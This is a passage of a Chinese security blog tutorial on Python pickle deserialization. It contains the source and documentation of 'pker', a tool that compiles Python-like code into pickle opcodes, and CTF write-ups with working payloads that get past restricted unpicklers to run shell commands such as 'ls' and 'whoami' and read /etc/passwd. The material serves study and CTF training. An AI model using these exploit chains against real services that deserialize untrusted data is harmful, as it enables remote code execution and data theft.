if not isinstance(key.value, ast.Name):
raise Exception("Left side of attribute assignment must be a Name")
self.push(cons_attr_assign(key.value.id, key.attr, value))

else:
raise Exception("Unsupported assignment target")

self._memo_index += 1

def gen_memo(self):
"""
生成“保存到 memo”指令:
p{idx}\n -> PUT idx
0 -> 兼容原版输出的紧随字符(保持协议0文本风格)
"""
return f'p{self._memo_index}\n0'

def lookup_memo(self, varname):
"""
变量名 -> memo 索引。未定义则抛错。
"""
try:
return self._context[varname]
except KeyError:
raise Exception(f"Variable `{varname}` is not defined")

def push(self, s):
"""把片段写入输出缓冲。"""
self._output.append(s)

def terminate(self, obj):
"""
处理 `return`:
- return None / 空 return:只输出 STOP('.')
- return <Name>:先 g{idx}\n,再 '.'
- return <literal/structure>:先构造,再 '.'
"""
if obj is not None:
if isinstance(obj, ast.Name):
self.push(f"g{self.lookup_memo(obj.id)}\n")
else:
self.push(cons_basic_type(extract_value(obj)))
self.push('.')

def invoke(self, node):
"""处理普通/宏调用表达式"""
self.push(cons_invoke(node))


# ========== AST 访问器:仅支持 Assign / Call / Return ==========

class Parser(ast.NodeVisitor):
def __init__(self):
self._pickler = Pickler()

def visit_Assign(self, node):
# 仅支持单目标赋值:x = ...
if len(node.targets) != 1:
raise Exception("Only single-target assignment is supported")
self._pickler[node.targets[0]] = node.value

def visit_Call(self, node):
self._pickler.invoke(node)

def visit_Return(self, node):
self._pickler.terminate(node.value)

def output(self):
return ''.join(self._pickler._output)


# ========== 顶层 API ==========

def cons(code_str: str) -> bytes:
"""
源码字符串 -> AST -> 生成的协议0文本指令(bytes)
"""
root = ast.parse(code_str)
p = Parser()
p.visit(root)
return p.output().encode()


# ========== CLI:文件 / 管道 / 交互 输入,输出 Pickle 指令 ==========
if __name__ == '__main__':
import sys
import argparse
from pathlib import Path


def read_from_stdin() -> str:
"""从 stdin 读取源码(管道 / 重定向)"""
return sys.stdin.read()


def read_interactive() -> str:
"""交互模式输入(连续两次空行结束)"""
print("pker <<< 请输入 Python 代码(连续两次空行结束,Ctrl-D 退出)")
lines, empty_count = [], 0
try:
while True:
line = input()
if line.strip() == "":
empty_count += 1
if empty_count >= 2:
break
else:
empty_count = 0
lines.append(line + "\n")
except (EOFError, KeyboardInterrupt):
print("\n[结束]", file=sys.stderr)
return "".join(lines)


def read_code(args) -> str:
"""按优先级获取代码:--code > files > stdin/交互"""
if args.code is not None:
return args.code

if args.files:
if args.files == ["-"]:
return read_from_stdin()
code_parts = []
for fp in args.files:
path = Path(fp)
if not path.is_file():
sys.exit(f"[错误] 文件不存在: {fp}")
code_parts.append(path.read_text(encoding="utf-8"))
return "\n".join(code_parts)

# 没有文件参数 → 根据 stdin 是否是 TTY 决定用管道还是交互
return read_from_stdin() if not sys.stdin.isatty() else read_interactive()


# ---------------- 参数解析 ----------------
parser = argparse.ArgumentParser(
prog="pker",
description="将 Python 源码转换为 Pickle 协议0(文本)指令串",
)
parser.add_argument("files", nargs="*", help="源码文件路径;'-' 表示强制从 stdin 读取")
parser.add_argument("-c", "--code", help="直接传入源码字符串(优先级最高)")
parser.add_argument("-o", "--output", help="将结果写入文件(默认打印到 stdout)")

fmt = parser.add_mutually_exclusive_group()
fmt.add_argument("--bytes", action="store_true", help="输出 Python bytes 字面量(默认)")
fmt.add_argument("--raw", action="store_true", help="输出原始协议0文本(非 repr)")
fmt.add_argument("--hex", action="store_true", help="输出十六进制编码")

parser.add_argument("--version", action="version", version="pker 1.0-cli")
args = parser.parse_args()

# ---------------- 获取源码 & 生成指令 ----------------
code_str = read_code(args)
try:
payload = cons(code_str) # bytes
except Exception as e:
sys.exit(f"[错误] 生成失败:{e}")

# ---------------- 格式化输出 ----------------
if args.raw:
out_text = payload.decode("utf-8", errors="strict")
elif args.hex:
out_text = payload.hex()
else:
out_text = repr(payload)

if args.output:
Path(args.output).write_text(out_text, encoding="utf-8")
else:
print(out_text)

使用方式

1
python3 pker.py [选项] [文件...]

输入优先级

  1. -c/--code → 直接传入一段源码字符串
  2. 文件参数(可多个,依次拼接)
  3. 无参数时:
    • 如果 stdin 是管道/重定向 → 读 stdin
    • 否则进入交互模式(两次空行结束输入)

输入模式

模式 示例 说明
源码字符串 pker.py -c "x=1;return x" 直接在命令行传代码
文件 pker.py payload.py 读取指定源码文件
多文件 pker.py part1.py part2.py 合并多个文件内容生成
stdin `cat payload.py pker.py`
强制 stdin pker.py - 不管 TTY 状态,直接读 stdin
交互模式 pker.py 手动输入,连续两次空行结束

输出格式

选项 说明 默认
--bytes Python bytes 字面量(b"..."
--raw 原始协议 0 文本(便于直接查看 opcode)
--hex 十六进制字符串(便于嵌入其他语言)

输出可保存到文件:

1
pker.py payload.py -o out.txt

支持的语法

pker 并不是一个完整的 Python 编译器,它只识别并处理一个受限的语法子集,并将其转换为对应的 Pickle 协议 0 文本指令。

支持的值类型:

  • 基本类型:intfloatstrNonebool
  • 容器类型:listtupledict
  • 变量引用(必须先赋值过)

赋值(变量会存入 pickle 的 memo 表)

形式 含义 生成效果(协议 0)
x = value value 的结果保存到变量 x(memo 表) <构造 value 的指令> pN\n0 (PUT N,保存到 memo 槽位)
x[i] = value 给容器 x 的下标 i 赋值 g<idx>\n <构造 i> <构造 value> s(GET idx,SETITEM)
x.attr = value 给对象 x 的属性 attr 赋值 g<idx>\n (}(<构造 attr> <构造 value> d t b)(通过 BUILD 更新属性)

示例:

1
2
3
a = [0]        # 列表存到 memo
a[0] = 123 # 修改下标 0
a.attr = 'hi' # 修改属性 attr

注意

protocol 0 里也没有“读属性/读下标”的专用 opcode,因此通常需要 GLOBAL('builtins','getattr')(x, '__getitem__') 来读取。但这在很多题里 builtins 会被禁用,所以通用性不强。

因此这里 pker 不支持下标读取的语法:

1
2
3
4
getattr = GLOBAL('builtins','getattr')
globals = GLOBAL('builtins','globals')()
builtins = globals['__builtins__'] # ❌ 不支持读下标
return getattr(builtins,'eval')('__import__("os").system("ls")')

函数调用

普通函数调用语法如下,其中 func 必须是已赋值过的变量。

1
func(a, b)

上述代码会被转换为 g<func_idx>\n (<构造 a> <构造 b> t R)(GET 函数 → 压参数 → TUPLE → REDUCE 调用)

另外 pker 还支持嵌套调用:

1
2
f()()
GLOBAL('os', 'system')('id')

pker 会先生成外层调用结果,再将结果作为可调用对象继续生成调用指令。

return(顶层可用)

形式 生成效果
return .(STOP,返回 None)
return expr <构造 expr> .(返回 expr 结果)

内置宏说明

内置宏是 pker 特有的保留字,用于快速生成特定的 pickle 指令,这些指令直接映射到协议 0 的“全局对象调用”相关 opcode。

GLOBAL(module, name)

引用模块中的对象(协议 0:c{module}\n{name}\n

1
2
system = GLOBAL('os', 'system')
system('id')

INST(module, name, *args)

实例化对象(协议 0:(<构造 args...> i{module}\n{name}\n

1
obj = INST('collections', 'Counter', ['a', 'b', 'a'])

OBJ(callable, *args)

调用可调用对象(协议 0:(<构造 callable> <构造 args...> o

1
result = OBJ(GLOBAL('math', 'pow'), 2, 3)

反序列化绕过

绕过 Restricted Unpickler

绕过黑名单

寻找未被限制的利用链

Code-Breaking picklecode 给出了一个黑名单的场景,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import pickle
import io
import builtins

__all__ = ('PickleSerializer', )


class RestrictedUnpickler(pickle.Unpickler):
blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name not in self.blacklist:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))


class PickleSerializer():
def dumps(self, obj):
return pickle.dumps(obj)

def loads(self, data):
try:
if isinstance(data, str):
raise TypeError("Can't load pickle from unicode string")
file = io.BytesIO(data)
return RestrictedUnpickler(file,
encoding='ASCII', errors='strict').load()
except Exception as e:
return {}

这道题将 evalexec 等关键词进行了过滤,这意味着无法直接通过 builtins.eval(即 GLOBAL(builtins, 'eval'))来获取 eval 函数。

一种方法是通过 builtins.getattr(builtins, 'eval') 进行绕过。然而我们需要先 getattr 的第一个参数 builtins 模块,因为 GLOBAL 只能获取模块中的某个对象,也就是说我们需要从 builtin.globals() 的结果中通过 dict.get 函数获取。

1
2
getattr = GLOBAL('builtins','getattr')
return getattr(getattr(GLOBAL('builtins','dict'),'get')(GLOBAL('builtins','globals')(),'__builtins__'),'eval')('__import__("os").system("ls")')

另一种比较简便的方式是直接通过 builtins.__getattribute__('eval') 获取。

1
return GLOBAL('builtins','__getattribute__')('eval')('__import__("os").system("ls")')

绕过白名单

模块劫持

BalsnCTF 2019 Pyshv1 中使用了白名单进行限制。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
## securePickle.py
import pickle, io

whitelist = []

## See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in whitelist or '.' in name:
raise KeyError('The pickle is spoilt :(')
return pickle.Unpickler.find_class(self, module, name)

def loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()

dumps = pickle.dumps

## server.py
pickle.whitelist.append('sys')

securePickle.py 中声明了一个 whitelistserver.py 中将 sys 模块添加到白名单中。也就是说这里只允许加载 sys 模块。

然而 sys 模块中有一个 modules 字典用来维护已加载模块名称与模块对象的映射,例如当我们调用 GLOBAL('sys', 'modules') 实际上会先尝试 modulessys 键对应的值作为模块对象。

换而言之我们可以先 GLOBAL('sys', 'modules') 获取到 sys.modules 并设置 modules['sys'] = modules,此时 sys.modules 被看做是 sys 模块:

  • 我们可以通过 GLOBAL('sys', 'get') 获取 sys.modules 中的任意模块。尝试发现 os 会随着 sys 一并加载,因此我们可以获取 os 模块。
  • 将获取的 os 模块覆写到 sys.modules['sys'],此时我们可以将 os 模块看做是 sys 模块使用。
1
2
3
4
modules = GLOBAL('sys', 'modules')
modules['sys'] = modules
modules['sys'] = GLOBAL('sys', 'get')('os')
return GLOBAL('sys', 'system')('whoami')

属性创建与函数劫持

BalsnCTF 2019 Pyshv2 中白名单只有一个 structs 模块。与 BalsnCTF 2019 Pyshv1 不同的是,BalsnCTF 2019 Pyshv1 中使用了 pickle.Unpickler.find_class(self, module, name) 去寻找类,而这道题中使用的是 __import__getattr 去获取。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
## securePickle.py
import pickle
import io


whitelist = []

## See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):

def find_class(self, module, name):
if module not in whitelist or '.' in name:
raise KeyError('The pickle is spoilt :(')
module = __import__(module)
return getattr(module, name)


def loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()


dumps = pickle.dumps

## server.py
pickle.whitelist.append('structs')

structs 模块是题目给出的 structs.py,其内容为空。对于 python 中导入的模块,都以通过获取其 __builtins__ 属性来获取 builtins 模块对应的字典,获取到这个字典之后,再获取 eval 函数就可以执行任意 python 代码了。目标是构造如下的代码:

1
structs.__builtins__['eval']

由于需要从字典中取值,因此也需要用到 dict.get 函数,由于这里获取到的 __builtins__ 只是一个字典,因此获取 dict.get 函数需要通过 __builtins__['dict'].get 去获取,再次需要通过字典去索引,这就会陷入死循环。

跳出这个死循环的关键是如何不通过 __builtins__['dict'].get 获取 get 函数。因为 __builtins__ 本身就是字典,因此这里我们采用现有的 getattr 函数执行 getattr(__builtins__, 'get') 获取。

注意到白名单校验之后会通过 __import__ 函数去导入模块,然后使用 getattr 获取属性。

1
2
module = __import__(module)
return getattr(module, name)

假如我们要通过 getattr(module, name) 获取到 dict.get 函数,就需要 module 的值为 __buitlins__ 字典,nameget,则上一步 module = __import__(module) 需要获取到 __buitlins__ 字典。但 module 的值仅能为 structs,因此正常情况下无法获取。

但 pickle 在反序列化时是可以进行全局覆盖的,如果将 __import__ 覆盖成 __getattribute__, 则在执行 module = __import__(module) 时,相当于执行:

1
module = structs.__getattribute__('structs')

此时会获取 structs 模块的 structs 属性。因此这里需要将 structs.structs 赋值为 __buitlins__ 字典。但由于 structs.structs 从未声明过,因此不可以直接使用 GLOBAL('structs', 'structs') 这样的形式进行获取,而是需要通过直接给 structs.__dict__['structs'] 赋值来实现。

1
2
3
__dict__ = GLOBAL('structs', '__dict__')
builtins = GLOBAL('structs', '__builtins__')
__dict__['structs'] = builtins

接着是覆盖 __import____getattribute__, 然后获取 dict.get 函数。

1
2
3
gtat = GLOBAL('structs', '__getattribute__')
builtins['__import__'] = gtat
builtin_get = GLOBAL('structs', 'get')

获取到 dict.get 函数之后,就可以从 __buitlins__ 字典获取 eval 函数了。最终 exp 为:

1
2
3
4
5
6
7
8
9
__dict__ = GLOBAL('structs', '__dict__')
builtins = GLOBAL('structs', '__builtins__')
gtat = GLOBAL('structs', '__getattribute__')
builtins['__import__'] = gtat
__dict__['structs'] = builtins
builtin_get = GLOBAL('structs', 'get')
eval = builtin_get('eval')
eval('print(open("/etc/passwd").read())')
return

注意

这里已经将 __import__ 函数进行了覆盖,因此不能再使用 eval('__import__("os").system("ls")') 来执行系统命令,但是可以使用 open 函数来读取文件内容。

有些题目会在自定义 find_class 里直接**调用原版的 pickle.Unpickler.find_class**,而不是自己去 __import__

1
2
3
4
def find_class(self, module, name):
if module not in whitelist or '.' in name:
raise KeyError(...)
return pickle.Unpickler.find_class(self, module, name)

这种调用等于让 C 实现的反序列化代码(内部逻辑)直接去解析全局名、导入模块,不会经过我们改过的 __import__(或者即便经过,也会在更早阶段做安全检查)。

方法创建

利用代码对象篡改函数

利用 load_build RCE

利用 load_newobj RCE

绕过操作码过滤

绕过字符串过滤

绕过 R 操作码过滤

  • Title: Pickle 反序列化
  • Author: sky123
  • Created at : 2025-08-11 23:58:04
  • Updated at : 2025-08-11 23:57:48
  • Link: https://skyi23.github.io/2025/08/11/Pickle 反序列化/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments